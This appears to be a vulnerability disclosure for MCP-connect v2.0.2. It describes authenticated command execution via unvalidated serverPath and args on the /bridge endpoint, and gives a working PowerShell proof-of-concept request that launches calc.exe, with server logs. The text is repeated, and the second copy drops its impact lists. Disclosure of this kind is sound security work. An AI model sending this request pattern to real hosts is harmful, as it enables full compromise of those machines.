Executive Summary
A security vulnerability exists in MCP-connect v2.0.2 in the /bridge endpoint.
Although the application enforces Bearer token authentication, it allows an authenticated user to supply arbitrary values for serverPath, args, and env. These parameters are used directly to initialize a local process via StdioClientTransport, without validation or restriction.
As a result, an authenticated attacker can:
- execute arbitrary system commands on the host machine
- This leads to authenticated remote code execution (RCE).
Proof of Concept (PoC)
Prerequisites
MCP-connect v2.0.2 running locally
Valid authentication token:
ACCESS_TOKEN=labtest
Exploit (PowerShell)
Target Configuration
$url = "http://127.0.0.1:3000/bridge"
$token = "labtest"
Exploit Payload: Execute arbitrary system binary
$body = @{
serverPath = "cmd.exe"
args = @("/c", "calc.exe")
method = "exploit_poc"
params = @{}
} | ConvertTo-Json -Compress
Send exploit request
Write-Host "Sending exploit..."
try {
Invoke-WebRequest -Uri $url -Method POST
-Headers @{ Authorization = "Bearer $token" } -ContentType "application/json"
-Body $body
} catch {
Write-Host "Expected error (process already executed): $_"
}
Observed Behavior
Server logs:
info: Bridge request received: {"serverPath":"cmd.exe","args":["/c","calc.exe"],...}
info: Creating client client_... for cmd.exe
error: Failed to create client for cmd.exe: MCP error -32000: Connection closed
System behavior:
calc.exe is executed on the host system
Key Observation
Even though the server returns an error (500 / MCP connection failure), the command execution occurs before the protocol handshake fails.
This confirms that:
arbitrary command execution is successfully triggered by user-controlled input
Impact
An authenticated attacker can:
- Execute arbitrary operating system commands
- Spawn reverse shells
- Access and manipulate local files
- Abuse installed system tools
- Establish persistence on the host
The vulnerability results in full compromise of the host system depending on the privileges of the running process.
Executive Summary
A security vulnerability exists in MCP-connect v2.0.2 in the /bridge endpoint.
Although the application enforces Bearer token authentication, it allows an authenticated user to supply arbitrary values for serverPath, args, and env. These parameters are used directly to initialize a local process via StdioClientTransport, without validation or restriction.
As a result, an authenticated attacker can:
Proof of Concept (PoC)
Prerequisites
MCP-connect v2.0.2 running locally
Valid authentication token:
ACCESS_TOKEN=labtest
Exploit (PowerShell)
Target Configuration
$url = "http://127.0.0.1:3000/bridge"
$token = "labtest"
Exploit Payload: Execute arbitrary system binary
$body = @{
serverPath = "cmd.exe"
args = @("/c", "calc.exe")
method = "exploit_poc"
params = @{}
} | ConvertTo-Json -Compress
Send exploit request
Write-Host "Sending exploit..."
try {
Invoke-WebRequest -Uri $url
-Method POST-Headers @{ Authorization = "Bearer $token" }
-ContentType "application/json"-Body $body
} catch {
Write-Host "Expected error (process already executed): $_"
}
Observed Behavior
Server logs:
info: Bridge request received: {"serverPath":"cmd.exe","args":["/c","calc.exe"],...}
info: Creating client client_... for cmd.exe
error: Failed to create client for cmd.exe: MCP error -32000: Connection closed
System behavior:
calc.exe is executed on the host system
Key Observation
Even though the server returns an error (500 / MCP connection failure), the command execution occurs before the protocol handshake fails.
This confirms that:
arbitrary command execution is successfully triggered by user-controlled input
Impact
An authenticated attacker can:
The vulnerability results in full compromise of the host system depending on the privileges of the running process.